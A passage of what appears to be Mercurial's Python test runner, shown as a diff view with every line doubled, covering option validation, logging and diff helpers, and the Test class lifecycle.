668 testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
669 reporootdir = os.path.dirname(testdir)
669 reporootdir = os.path.dirname(testdir)
670 pathandattrs = [(b'hg', 'with_hg')]
670 pathandattrs = [(b'hg', 'with_hg')]
671 if options.chg:
671 if options.chg:
672 pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
672 pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
673 for relpath, attr in pathandattrs:
673 for relpath, attr in pathandattrs:
674 binpath = os.path.join(reporootdir, relpath)
674 binpath = os.path.join(reporootdir, relpath)
675 if os.name != 'nt' and not os.access(binpath, os.X_OK):
675 if os.name != 'nt' and not os.access(binpath, os.X_OK):
676 parser.error(
676 parser.error(
677 '--local specified, but %r not found or '
677 '--local specified, but %r not found or '
678 'not executable' % binpath
678 'not executable' % binpath
679 )
679 )
680 setattr(options, attr, _bytes2sys(binpath))
680 setattr(options, attr, _bytes2sys(binpath))
681
681
682 if options.with_hg:
682 if options.with_hg:
683 options.with_hg = canonpath(_sys2bytes(options.with_hg))
683 options.with_hg = canonpath(_sys2bytes(options.with_hg))
684 if not (
684 if not (
685 os.path.isfile(options.with_hg)
685 os.path.isfile(options.with_hg)
686 and os.access(options.with_hg, os.X_OK)
686 and os.access(options.with_hg, os.X_OK)
687 ):
687 ):
688 parser.error('--with-hg must specify an executable hg script')
688 parser.error('--with-hg must specify an executable hg script')
689 if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
689 if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
690 sys.stderr.write('warning: --with-hg should specify an hg script\n')
690 sys.stderr.write('warning: --with-hg should specify an hg script\n')
691 sys.stderr.flush()
691 sys.stderr.flush()
692
692
693 if (options.chg or options.with_chg) and os.name == 'nt':
693 if (options.chg or options.with_chg) and os.name == 'nt':
694 parser.error('chg does not work on %s' % os.name)
694 parser.error('chg does not work on %s' % os.name)
695 if options.with_chg:
695 if options.with_chg:
696 options.chg = False # no installation to temporary location
696 options.chg = False # no installation to temporary location
697 options.with_chg = canonpath(_sys2bytes(options.with_chg))
697 options.with_chg = canonpath(_sys2bytes(options.with_chg))
698 if not (
698 if not (
699 os.path.isfile(options.with_chg)
699 os.path.isfile(options.with_chg)
700 and os.access(options.with_chg, os.X_OK)
700 and os.access(options.with_chg, os.X_OK)
701 ):
701 ):
702 parser.error('--with-chg must specify a chg executable')
702 parser.error('--with-chg must specify a chg executable')
703 if options.chg and options.with_hg:
703 if options.chg and options.with_hg:
704 # chg shares installation location with hg
704 # chg shares installation location with hg
705 parser.error(
705 parser.error(
706 '--chg does not work when --with-hg is specified '
706 '--chg does not work when --with-hg is specified '
707 '(use --with-chg instead)'
707 '(use --with-chg instead)'
708 )
708 )
709
709
710 if options.color == 'always' and not pygmentspresent:
710 if options.color == 'always' and not pygmentspresent:
711 sys.stderr.write(
711 sys.stderr.write(
712 'warning: --color=always ignored because '
712 'warning: --color=always ignored because '
713 'pygments is not installed\n'
713 'pygments is not installed\n'
714 )
714 )
715
715
716 if options.bisect_repo and not options.known_good_rev:
716 if options.bisect_repo and not options.known_good_rev:
717 parser.error("--bisect-repo cannot be used without --known-good-rev")
717 parser.error("--bisect-repo cannot be used without --known-good-rev")
718
718
719 global useipv6
719 global useipv6
720 if options.ipv6:
720 if options.ipv6:
721 useipv6 = checksocketfamily('AF_INET6')
721 useipv6 = checksocketfamily('AF_INET6')
722 else:
722 else:
723 # only use IPv6 if IPv4 is unavailable and IPv6 is available
723 # only use IPv6 if IPv4 is unavailable and IPv6 is available
724 useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
724 useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
725 'AF_INET6'
725 'AF_INET6'
726 )
726 )
727
727
728 options.anycoverage = options.cover or options.annotate or options.htmlcov
728 options.anycoverage = options.cover or options.annotate or options.htmlcov
729 if options.anycoverage:
729 if options.anycoverage:
730 try:
730 try:
731 import coverage
731 import coverage
732
732
733 covver = version.StrictVersion(coverage.__version__).version
733 covver = version.StrictVersion(coverage.__version__).version
734 if covver < (3, 3):
734 if covver < (3, 3):
735 parser.error('coverage options require coverage 3.3 or later')
735 parser.error('coverage options require coverage 3.3 or later')
736 except ImportError:
736 except ImportError:
737 parser.error('coverage options now require the coverage package')
737 parser.error('coverage options now require the coverage package')
738
738
739 if options.anycoverage and options.local:
739 if options.anycoverage and options.local:
740 # this needs some path mangling somewhere, I guess
740 # this needs some path mangling somewhere, I guess
741 parser.error(
741 parser.error(
742 "sorry, coverage options do not work when --local " "is specified"
742 "sorry, coverage options do not work when --local " "is specified"
743 )
743 )
744
744
745 if options.anycoverage and options.with_hg:
745 if options.anycoverage and options.with_hg:
746 parser.error(
746 parser.error(
747 "sorry, coverage options do not work when --with-hg " "is specified"
747 "sorry, coverage options do not work when --with-hg " "is specified"
748 )
748 )
749
749
750 global verbose
750 global verbose
751 if options.verbose:
751 if options.verbose:
752 verbose = ''
752 verbose = ''
753
753
754 if options.tmpdir:
754 if options.tmpdir:
755 options.tmpdir = canonpath(options.tmpdir)
755 options.tmpdir = canonpath(options.tmpdir)
756
756
757 if options.jobs < 1:
757 if options.jobs < 1:
758 parser.error('--jobs must be positive')
758 parser.error('--jobs must be positive')
759 if options.interactive and options.debug:
759 if options.interactive and options.debug:
760 parser.error("-i/--interactive and -d/--debug are incompatible")
760 parser.error("-i/--interactive and -d/--debug are incompatible")
761 if options.debug:
761 if options.debug:
762 if options.timeout != defaults['timeout']:
762 if options.timeout != defaults['timeout']:
763 sys.stderr.write('warning: --timeout option ignored with --debug\n')
763 sys.stderr.write('warning: --timeout option ignored with --debug\n')
764 if options.slowtimeout != defaults['slowtimeout']:
764 if options.slowtimeout != defaults['slowtimeout']:
765 sys.stderr.write(
765 sys.stderr.write(
766 'warning: --slowtimeout option ignored with --debug\n'
766 'warning: --slowtimeout option ignored with --debug\n'
767 )
767 )
768 options.timeout = 0
768 options.timeout = 0
769 options.slowtimeout = 0
769 options.slowtimeout = 0
770
770
771 if options.blacklist:
771 if options.blacklist:
772 options.blacklist = parselistfiles(options.blacklist, 'blacklist')
772 options.blacklist = parselistfiles(options.blacklist, 'blacklist')
773 if options.whitelist:
773 if options.whitelist:
774 options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
774 options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
775 else:
775 else:
776 options.whitelisted = {}
776 options.whitelisted = {}
777
777
778 if options.showchannels:
778 if options.showchannels:
779 options.nodiff = True
779 options.nodiff = True
780
780
781 return options
781 return options
782
782
783
783
784 def rename(src, dst):
784 def rename(src, dst):
785 """Like os.rename(), trade atomicity and opened files friendliness
785 """Like os.rename(), trade atomicity and opened files friendliness
786 for existing destination support.
786 for existing destination support.
787 """
787 """
788 shutil.copy(src, dst)
788 shutil.copy(src, dst)
789 os.remove(src)
789 os.remove(src)
790
790
791
791
792 def makecleanable(path):
792 def makecleanable(path):
793 """Try to fix directory permission recursively so that the entire tree
793 """Try to fix directory permission recursively so that the entire tree
794 can be deleted"""
794 can be deleted"""
795 for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
795 for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
796 for d in dirnames:
796 for d in dirnames:
797 p = os.path.join(dirpath, d)
797 p = os.path.join(dirpath, d)
798 try:
798 try:
799 os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
799 os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
800 except OSError:
800 except OSError:
801 pass
801 pass
802
802
803
803
804 _unified_diff = difflib.unified_diff
804 _unified_diff = difflib.unified_diff
805 if PYTHON3:
805 if PYTHON3:
806 import functools
806 import functools
807
807
808 _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
808 _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
809
809
810
810
811 def getdiff(expected, output, ref, err):
811 def getdiff(expected, output, ref, err):
812 servefail = False
812 servefail = False
813 lines = []
813 lines = []
814 for line in _unified_diff(expected, output, ref, err):
814 for line in _unified_diff(expected, output, ref, err):
815 if line.startswith(b'+++') or line.startswith(b'---'):
815 if line.startswith(b'+++') or line.startswith(b'---'):
816 line = line.replace(b'\\', b'/')
816 line = line.replace(b'\\', b'/')
817 if line.endswith(b' \n'):
817 if line.endswith(b' \n'):
818 line = line[:-2] + b'\n'
818 line = line[:-2] + b'\n'
819 lines.append(line)
819 lines.append(line)
820 if not servefail and line.startswith(
820 if not servefail and line.startswith(
821 b'+ abort: child process failed to start'
821 b'+ abort: child process failed to start'
822 ):
822 ):
823 servefail = True
823 servefail = True
824
824
825 return servefail, lines
825 return servefail, lines
826
826
827
827
828 verbose = False
828 verbose = False
829
829
830
830
831 def vlog(*msg):
831 def vlog(*msg):
832 """Log only when in verbose mode."""
832 """Log only when in verbose mode."""
833 if verbose is False:
833 if verbose is False:
834 return
834 return
835
835
836 return log(*msg)
836 return log(*msg)
837
837
838
838
839 # Bytes that break XML even in a CDATA block: control characters 0-31
839 # Bytes that break XML even in a CDATA block: control characters 0-31
840 # sans \t, \n and \r
840 # sans \t, \n and \r
841 CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
841 CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
842
842
843 # Match feature conditionalized output lines in the form, capturing the feature
843 # Match feature conditionalized output lines in the form, capturing the feature
844 # list in group 2, and the preceeding line output in group 1:
844 # list in group 2, and the preceeding line output in group 1:
845 #
845 #
846 # output..output (feature !)\n
846 # output..output (feature !)\n
847 optline = re.compile(br'(.*) \((.+?) !\)\n$')
847 optline = re.compile(br'(.*) \((.+?) !\)\n$')
848
848
849
849
850 def cdatasafe(data):
850 def cdatasafe(data):
851 """Make a string safe to include in a CDATA block.
851 """Make a string safe to include in a CDATA block.
852
852
853 Certain control characters are illegal in a CDATA block, and
853 Certain control characters are illegal in a CDATA block, and
854 there's no way to include a ]]> in a CDATA either. This function
854 there's no way to include a ]]> in a CDATA either. This function
855 replaces illegal bytes with ? and adds a space between the ]] so
855 replaces illegal bytes with ? and adds a space between the ]] so
856 that it won't break the CDATA block.
856 that it won't break the CDATA block.
857 """
857 """
858 return CDATA_EVIL.sub(b'?', data).replace(b']]>', b'] ]>')
858 return CDATA_EVIL.sub(b'?', data).replace(b']]>', b'] ]>')
859
859
860
860
861 def log(*msg):
861 def log(*msg):
862 """Log something to stdout.
862 """Log something to stdout.
863
863
864 Arguments are strings to print.
864 Arguments are strings to print.
865 """
865 """
866 with iolock:
866 with iolock:
867 if verbose:
867 if verbose:
868 print(verbose, end=' ')
868 print(verbose, end=' ')
869 for m in msg:
869 for m in msg:
870 print(m, end=' ')
870 print(m, end=' ')
871 print()
871 print()
872 sys.stdout.flush()
872 sys.stdout.flush()
873
873
874
874
875 def highlightdiff(line, color):
875 def highlightdiff(line, color):
876 if not color:
876 if not color:
877 return line
877 return line
878 assert pygmentspresent
878 assert pygmentspresent
879 return pygments.highlight(
879 return pygments.highlight(
880 line.decode('latin1'), difflexer, terminal256formatter
880 line.decode('latin1'), difflexer, terminal256formatter
881 ).encode('latin1')
881 ).encode('latin1')
882
882
883
883
884 def highlightmsg(msg, color):
884 def highlightmsg(msg, color):
885 if not color:
885 if not color:
886 return msg
886 return msg
887 assert pygmentspresent
887 assert pygmentspresent
888 return pygments.highlight(msg, runnerlexer, runnerformatter)
888 return pygments.highlight(msg, runnerlexer, runnerformatter)
889
889
890
890
891 def terminate(proc):
891 def terminate(proc):
892 """Terminate subprocess"""
892 """Terminate subprocess"""
893 vlog('# Terminating process %d' % proc.pid)
893 vlog('# Terminating process %d' % proc.pid)
894 try:
894 try:
895 proc.terminate()
895 proc.terminate()
896 except OSError:
896 except OSError:
897 pass
897 pass
898
898
899
899
900 def killdaemons(pidfile):
900 def killdaemons(pidfile):
901 import killdaemons as killmod
901 import killdaemons as killmod
902
902
903 return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
903 return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
904
904
905
905
906 class Test(unittest.TestCase):
906 class Test(unittest.TestCase):
907 """Encapsulates a single, runnable test.
907 """Encapsulates a single, runnable test.
908
908
909 While this class conforms to the unittest.TestCase API, it differs in that
909 While this class conforms to the unittest.TestCase API, it differs in that
910 instances need to be instantiated manually. (Typically, unittest.TestCase
910 instances need to be instantiated manually. (Typically, unittest.TestCase
911 classes are instantiated automatically by scanning modules.)
911 classes are instantiated automatically by scanning modules.)
912 """
912 """
913
913
914 # Status code reserved for skipped tests (used by hghave).
914 # Status code reserved for skipped tests (used by hghave).
915 SKIPPED_STATUS = 80
915 SKIPPED_STATUS = 80
916
916
917 def __init__(
917 def __init__(
918 self,
918 self,
919 path,
919 path,
920 outputdir,
920 outputdir,
921 tmpdir,
921 tmpdir,
922 keeptmpdir=False,
922 keeptmpdir=False,
923 debug=False,
923 debug=False,
924 first=False,
924 first=False,
925 timeout=None,
925 timeout=None,
926 startport=None,
926 startport=None,
927 extraconfigopts=None,
927 extraconfigopts=None,
928 shell=None,
928 shell=None,
929 hgcommand=None,
929 hgcommand=None,
930 slowtimeout=None,
930 slowtimeout=None,
931 usechg=False,
931 usechg=False,
932 chgdebug=False,
932 chgdebug=False,
933 useipv6=False,
933 useipv6=False,
934 ):
934 ):
935 """Create a test from parameters.
935 """Create a test from parameters.
936
936
937 path is the full path to the file defining the test.
937 path is the full path to the file defining the test.
938
938
939 tmpdir is the main temporary directory to use for this test.
939 tmpdir is the main temporary directory to use for this test.
940
940
941 keeptmpdir determines whether to keep the test's temporary directory
941 keeptmpdir determines whether to keep the test's temporary directory
942 after execution. It defaults to removal (False).
942 after execution. It defaults to removal (False).
943
943
944 debug mode will make the test execute verbosely, with unfiltered
944 debug mode will make the test execute verbosely, with unfiltered
945 output.
945 output.
946
946
947 timeout controls the maximum run time of the test. It is ignored when
947 timeout controls the maximum run time of the test. It is ignored when
948 debug is True. See slowtimeout for tests with #require slow.
948 debug is True. See slowtimeout for tests with #require slow.
949
949
950 slowtimeout overrides timeout if the test has #require slow.
950 slowtimeout overrides timeout if the test has #require slow.
951
951
952 startport controls the starting port number to use for this test. Each
952 startport controls the starting port number to use for this test. Each
953 test will reserve 3 port numbers for execution. It is the caller's
953 test will reserve 3 port numbers for execution. It is the caller's
954 responsibility to allocate a non-overlapping port range to Test
954 responsibility to allocate a non-overlapping port range to Test
955 instances.
955 instances.
956
956
957 extraconfigopts is an iterable of extra hgrc config options. Values
957 extraconfigopts is an iterable of extra hgrc config options. Values
958 must have the form "key=value" (something understood by hgrc). Values
958 must have the form "key=value" (something understood by hgrc). Values
959 of the form "foo.key=value" will result in "[foo] key=value".
959 of the form "foo.key=value" will result in "[foo] key=value".
960
960
961 shell is the shell to execute tests in.
961 shell is the shell to execute tests in.
962 """
962 """
963 if timeout is None:
963 if timeout is None:
964 timeout = defaults['timeout']
964 timeout = defaults['timeout']
965 if startport is None:
965 if startport is None:
966 startport = defaults['port']
966 startport = defaults['port']
967 if slowtimeout is None:
967 if slowtimeout is None:
968 slowtimeout = defaults['slowtimeout']
968 slowtimeout = defaults['slowtimeout']
969 self.path = path
969 self.path = path
970 self.bname = os.path.basename(path)
970 self.bname = os.path.basename(path)
971 self.name = _bytes2sys(self.bname)
971 self.name = _bytes2sys(self.bname)
972 self._testdir = os.path.dirname(path)
972 self._testdir = os.path.dirname(path)
973 self._outputdir = outputdir
973 self._outputdir = outputdir
974 self._tmpname = os.path.basename(path)
974 self._tmpname = os.path.basename(path)
975 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
975 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
976
976
977 self._threadtmp = tmpdir
977 self._threadtmp = tmpdir
978 self._keeptmpdir = keeptmpdir
978 self._keeptmpdir = keeptmpdir
979 self._debug = debug
979 self._debug = debug
980 self._first = first
980 self._first = first
981 self._timeout = timeout
981 self._timeout = timeout
982 self._slowtimeout = slowtimeout
982 self._slowtimeout = slowtimeout
983 self._startport = startport
983 self._startport = startport
984 self._extraconfigopts = extraconfigopts or []
984 self._extraconfigopts = extraconfigopts or []
985 self._shell = _sys2bytes(shell)
985 self._shell = _sys2bytes(shell)
986 self._hgcommand = hgcommand or b'hg'
986 self._hgcommand = hgcommand or b'hg'
987 self._usechg = usechg
987 self._usechg = usechg
988 self._chgdebug = chgdebug
988 self._chgdebug = chgdebug
989 self._useipv6 = useipv6
989 self._useipv6 = useipv6
990
990
991 self._aborted = False
991 self._aborted = False
992 self._daemonpids = []
992 self._daemonpids = []
993 self._finished = None
993 self._finished = None
994 self._ret = None
994 self._ret = None
995 self._out = None
995 self._out = None
996 self._skipped = None
996 self._skipped = None
997 self._testtmp = None
997 self._testtmp = None
998 self._chgsockdir = None
998 self._chgsockdir = None
999
999
1000 self._refout = self.readrefout()
1000 self._refout = self.readrefout()
1001
1001
1002 def readrefout(self):
1002 def readrefout(self):
1003 """read reference output"""
1003 """read reference output"""
1004 # If we're not in --debug mode and reference output file exists,
1004 # If we're not in --debug mode and reference output file exists,
1005 # check test output against it.
1005 # check test output against it.
1006 if self._debug:
1006 if self._debug:
1007 return None # to match "out is None"
1007 return None # to match "out is None"
1008 elif os.path.exists(self.refpath):
1008 elif os.path.exists(self.refpath):
1009 with open(self.refpath, 'rb') as f:
1009 with open(self.refpath, 'rb') as f:
1010 return f.read().splitlines(True)
1010 return f.read().splitlines(True)
1011 else:
1011 else:
1012 return []
1012 return []
1013
1013
1014 # needed to get base class __repr__ running
1014 # needed to get base class __repr__ running
1015 @property
1015 @property
1016 def _testMethodName(self):
1016 def _testMethodName(self):
1017 return self.name
1017 return self.name
1018
1018
1019 def __str__(self):
1019 def __str__(self):
1020 return self.name
1020 return self.name
1021
1021
1022 def shortDescription(self):
1022 def shortDescription(self):
1023 return self.name
1023 return self.name
1024
1024
1025 def setUp(self):
1025 def setUp(self):
1026 """Tasks to perform before run()."""
1026 """Tasks to perform before run()."""
1027 self._finished = False
1027 self._finished = False
1028 self._ret = None
1028 self._ret = None
1029 self._out = None
1029 self._out = None
1030 self._skipped = None
1030 self._skipped = None
1031
1031
1032 try:
1032 try:
1033 os.mkdir(self._threadtmp)
1033 os.mkdir(self._threadtmp)
1034 except OSError as e:
1034 except OSError as e:
1035 if e.errno != errno.EEXIST:
1035 if e.errno != errno.EEXIST:
1036 raise
1036 raise
1037
1037
1038 name = self._tmpname
1038 name = self._tmpname
1039 self._testtmp = os.path.join(self._threadtmp, name)
1039 self._testtmp = os.path.join(self._threadtmp, name)
1040 os.mkdir(self._testtmp)
1040 os.mkdir(self._testtmp)
1041
1041
1042 # Remove any previous output files.
1042 # Remove any previous output files.
1043 if os.path.exists(self.errpath):
1043 if os.path.exists(self.errpath):
1044 try:
1044 try:
1045 os.remove(self.errpath)
1045 os.remove(self.errpath)
1046 except OSError as e:
1046 except OSError as e:
1047 # We might have raced another test to clean up a .err
1047 # We might have raced another test to clean up a .err
1048 # file, so ignore ENOENT when removing a previous .err
1048 # file, so ignore ENOENT when removing a previous .err
1049 # file.
1049 # file.
1050 if e.errno != errno.ENOENT:
1050 if e.errno != errno.ENOENT:
1051 raise
1051 raise
1052
1052
1053 if self._usechg:
1053 if self._usechg:
1054 self._chgsockdir = os.path.join(
1054 self._chgsockdir = os.path.join(
1055 self._threadtmp, b'%s.chgsock' % name
1055 self._threadtmp, b'%s.chgsock' % name
1056 )
1056 )
1057 os.mkdir(self._chgsockdir)
1057 os.mkdir(self._chgsockdir)
1058
1058
1059 def run(self, result):
1059 def run(self, result):
1060 """Run this test and report results against a TestResult instance."""
1060 """Run this test and report results against a TestResult instance."""
1061 # This function is extremely similar to unittest.TestCase.run(). Once
1061 # This function is extremely similar to unittest.TestCase.run(). Once
1062 # we require Python 2.7 (or at least its version of unittest), this
1062 # we require Python 2.7 (or at least its version of unittest), this
1063 # function can largely go away.
1063 # function can largely go away.
1064 self._result = result
1064 self._result = result
1065 result.startTest(self)
1065 result.startTest(self)
1066 try:
1066 try:
1067 try:
1067 try:
1068 self.setUp()
1068 self.setUp()
1069 except (KeyboardInterrupt, SystemExit):
1069 except (KeyboardInterrupt, SystemExit):
1070 self._aborted = True
1070 self._aborted = True
1071 raise
1071 raise
1072 except Exception:
1072 except Exception:
1073 result.addError(self, sys.exc_info())
1073 result.addError(self, sys.exc_info())
1074 return
1074 return
1075
1075
1076 success = False
1076 success = False
1077 try:
1077 try:
1078 self.runTest()
1078 self.runTest()
1079 except KeyboardInterrupt:
1079 except KeyboardInterrupt:
1080 self._aborted = True
1080 self._aborted = True
1081 raise
1081 raise
1082 except unittest.SkipTest as e:
1082 except unittest.SkipTest as e:
1083 result.addSkip(self, str(e))
1083 result.addSkip(self, str(e))
1084 # The base class will have already counted this as a
1084 # The base class will have already counted this as a
1085 # test we "ran", but we want to exclude skipped tests
1085 # test we "ran", but we want to exclude skipped tests
1086 # from those we count towards those run.
1086 # from those we count towards those run.
1087 result.testsRun -= 1
1087 result.testsRun -= 1
1088 except self.failureException as e:
1088 except self.failureException as e:
1089 # This differs from unittest in that we don't capture
1089 # This differs from unittest in that we don't capture
1090 # the stack trace. This is for historical reasons and
1090 # the stack trace. This is for historical reasons and
1091 # this decision could be revisited in the future,
1091 # this decision could be revisited in the future,
1092 # especially for PythonTest instances.
1092 # especially for PythonTest instances.
1093 if result.addFailure(self, str(e)):
1093 if result.addFailure(self, str(e)):
1094 success = True
1094 success = True
1095 except Exception:
1095 except Exception:
1096 result.addError(self, sys.exc_info())
1096 result.addError(self, sys.exc_info())
1097 else:
1097 else:
1098 success = True
1098 success = True
1099
1099
1100 try:
1100 try:
1101 self.tearDown()
1101 self.tearDown()
1102 except (KeyboardInterrupt, SystemExit):
1102 except (KeyboardInterrupt, SystemExit):
1103 self._aborted = True
1103 self._aborted = True
1104 raise
1104 raise
1105 except Exception:
1105 except Exception:
1106 result.addError(self, sys.exc_info())
1106 result.addError(self, sys.exc_info())
1107 success = False
1107 success = False
1108
1108
1109 if success:
1109 if success:
1110 result.addSuccess(self)
1110 result.addSuccess(self)
1111 finally:
1111 finally:
1112 result.stopTest(self, interrupted=self._aborted)
1112 result.stopTest(self, interrupted=self._aborted)
1113
1113
1114 def runTest(self):
1114 def runTest(self):
1115 """Run this test instance.
1115 """Run this test instance.
1116
1116
1117 This will return a tuple describing the result of the test.
1117 This will return a tuple describing the result of the test.
1118 """
1118 """
1119 env = self._getenv()
1119 env = self._getenv()
1120 self._genrestoreenv(env)
1120 self._genrestoreenv(env)
1121 self._daemonpids.append(env['DAEMON_PIDS'])
1121 self._daemonpids.append(env['DAEMON_PIDS'])
1122 self._createhgrc(env['HGRCPATH'])
1122 self._createhgrc(env['HGRCPATH'])
1123
1123
1124 vlog('# Test', self.name)
1124 vlog('# Test', self.name)
1125
1125
1126 ret, out = self._run(env)
1126 ret, out = self._run(env)
1127 self._finished = True
1127 self._finished = True
1128 self._ret = ret
1128 self._ret = ret
1129 self._out = out
1129 self._out = out
1130
1130
1131 def describe(ret):
1131 def describe(ret):
1132 if ret < 0:
1132 if ret < 0:
1133 return 'killed by signal: %d' % -ret
1133 return 'killed by signal: %d' % -ret
1134 return 'returned error code %d' % ret
1134 return 'returned error code %d' % ret
1135
1135
1136 self._skipped = False
1136 self._skipped = False
1137
1137
1138 if ret == self.SKIPPED_STATUS:
1138 if ret == self.SKIPPED_STATUS:
1139 if out is None: # Debug mode, nothing to parse.
1139 if out is None: # Debug mode, nothing to parse.
1140 missing = ['unknown']
1140 missing = ['unknown']
1141 failed = None
1141 failed = None
1142 else:
1142 else:
1143 missing, failed = TTest.parsehghaveoutput(out)
1143 missing, failed = TTest.parsehghaveoutput(out)
1144
1144
1145 if not missing:
1145 if not missing:
1146 missing = ['skipped']
1146 missing = ['skipped']
1147
1147
1148 if failed:
1148 if failed:
1149 self.fail('hg have failed checking for %s' % failed[-1])
1149 self.fail('hg have failed checking for %s' % failed[-1])
1150 else:
1150 else:
1151 self._skipped = True
1151 self._skipped = True
1152 raise unittest.SkipTest(missing[-1])
1152 raise unittest.SkipTest(missing[-1])
1153 elif ret == 'timeout':
1153 elif ret == 'timeout':
1154 self.fail('timed out')
1154 self.fail('timed out')
1155 elif ret is False:
1155 elif ret is False:
1156 self.fail('no result code from test')
1156 self.fail('no result code from test')
1157 elif out != self._refout:
1157 elif out != self._refout:
1158 # Diff generation may rely on written .err file.
1158 # Diff generation may rely on written .err file.
1159 if (
1159 if (
1160 (ret != 0 or out != self._refout)
1160 (ret != 0 or out != self._refout)
1161 and not self._skipped
1161 and not self._skipped
1162 and not self._debug
1162 and not self._debug
1163 ):
1163 ):
1164 with open(self.errpath, 'wb') as f:
1164 with open(self.errpath, 'wb') as f:
1165 for line in out:
1165 for line in out:
1166 f.write(line)
1166 f.write(line)
1167
1167
1168 # The result object handles diff calculation for us.
1168 # The result object handles diff calculation for us.
1169 with firstlock:
1169 with firstlock:
1170 if self._result.addOutputMismatch(self, ret, out, self._refout):
1170 if self._result.addOutputMismatch(self, ret, out, self._refout):
1171 # change was accepted, skip failing
1171 # change was accepted, skip failing
1172 return
1172 return
1173 if self._first:
1173 if self._first:
1174 global firsterror
1174 global firsterror
1175 firsterror = True
1175 firsterror = True
1176
1176
1177 if ret:
1177 if ret:
1178 msg = 'output changed and ' + describe(ret)
1178 msg = 'output changed and ' + describe(ret)
1179 else:
1179 else:
1180 msg = 'output changed'
1180 msg = 'output changed'
1181
1181
1182 self.fail(msg)
1182 self.fail(msg)
1183 elif ret:
1183 elif ret:
1184 self.fail(describe(ret))
1184 self.fail(describe(ret))
1185
1185
1186 def tearDown(self):
1186 def tearDown(self):
1187 """Tasks to perform after run()."""
1187 """Tasks to perform after run()."""
1188 for entry in self._daemonpids:
1188 for entry in self._daemonpids:
1189 killdaemons(entry)
1189 killdaemons(entry)
1190 self._daemonpids = []
1190 self._daemonpids = []
1191
1191
1192 if self._keeptmpdir:
1192 if self._keeptmpdir:
1193 log(
1193 log(
1194 '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
1194 '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
1195 % (_bytes2sys(self._testtmp), _bytes2sys(self._threadtmp),)
1195 % (_bytes2sys(self._testtmp), _bytes2sys(self._threadtmp),)
1196 )
1196 )
1197 else:
1197 else:
1198 try:
1198 try:
1199 shutil.rmtree(self._testtmp)
1199 shutil.rmtree(self._testtmp)
1200 except OSError:
1200 except OSError:
1201 # unreadable directory may be left in $TESTTMP; fix permission
1201 # unreadable directory may be left in $TESTTMP; fix permission
1202 # and try again
1202 # and try again
1203 makecleanable(self._testtmp)
1203 makecleanable(self._testtmp)
1204 shutil.rmtree(self._testtmp, True)
1204 shutil.rmtree(self._testtmp, True)
1205 shutil.rmtree(self._threadtmp, True)
1205 shutil.rmtree(self._threadtmp, True)
1206
1206
1207 if self._usechg:
1207 if self._usechg:
1208 # chgservers will stop automatically after they find the socket
1208 # chgservers will stop automatically after they find the socket
1209 # files are deleted
1209 # files are deleted
1210 shutil.rmtree(self._chgsockdir, True)
1210 shutil.rmtree(self._chgsockdir, True)
1211
1211
1212 if (
1212 if (
1213 (self._ret != 0 or self._out != self._refout)
1213 (self._ret != 0 or self._out != self._refout)
1214 and not self._skipped
1214 and not self._skipped
1215 and not self._debug
1215 and not self._debug
1216 and self._out
1216 and self._out
1217 ):
1217 ):
1218 with open(self.errpath, 'wb') as f:
1218 with open(self.errpath, 'wb') as f:
1219 for line in self._out:
1219 for line in self._out:
1220 f.write(line)
1220 f.write(line)
1221
1221
1222 vlog("# Ret was:", self._ret, '(%s)' % self.name)
1222 vlog("# Ret was:", self._ret, '(%s)' % self.name)
1223
1223
1224 def _run(self, env):
1224 def _run(self, env):
1225 # This should be implemented in child classes to run tests.
1225 # This should be implemented in child classes to run tests.
1226 raise unittest.SkipTest('unknown test type')
1226 raise unittest.SkipTest('unknown test type')
1227
1227
1228 def abort(self):
1228 def abort(self):
1229 """Terminate execution of this test."""
1229 """Terminate execution of this test."""
1230 self._aborted = True
1230 self._aborted = True
1231
1231
1232 def _portmap(self, i):
1232 def _portmap(self, i):
1233 offset = b'' if i == 0 else b'%d' % i
1233 offset = b'' if i == 0 else b'%d' % i
1234 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1234 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1235
1235
1236 def _getreplacements(self):
1236 def _getreplacements(self):
1237 """Obtain a mapping of text replacements to apply to test output.
1237 """Obtain a mapping of text replacements to apply to test output.
1238
1238
1239 Test output needs to be normalized so it can be compared to expected
1239 Test output needs to be normalized so it can be compared to expected
1240 output. This function defines how some of that normalization will
1240 output. This function defines how some of that normalization will
1241 occur.
1241 occur.
1242 """
1242 """
1243 r = [
1243 r = [
1244 # This list should be parallel to defineport in _getenv
1244 # This list should be parallel to defineport in _getenv
1245 self._portmap(0),
1245 self._portmap(0),
1246 self._portmap(1),
1246 self._portmap(1),
1247 self._portmap(2),
1247 self._portmap(2),
1248 (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
1248 (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
1249 (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
1249 (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
1250 ]
1250 ]
1251 r.append((self._escapepath(self._testtmp), b'$TESTTMP'))
1251 r.append((self._escapepath(self._testtmp), b'$TESTTMP'))
1252
1252
1253 replacementfile = os.path.join(self._testdir, b'common-pattern.py')
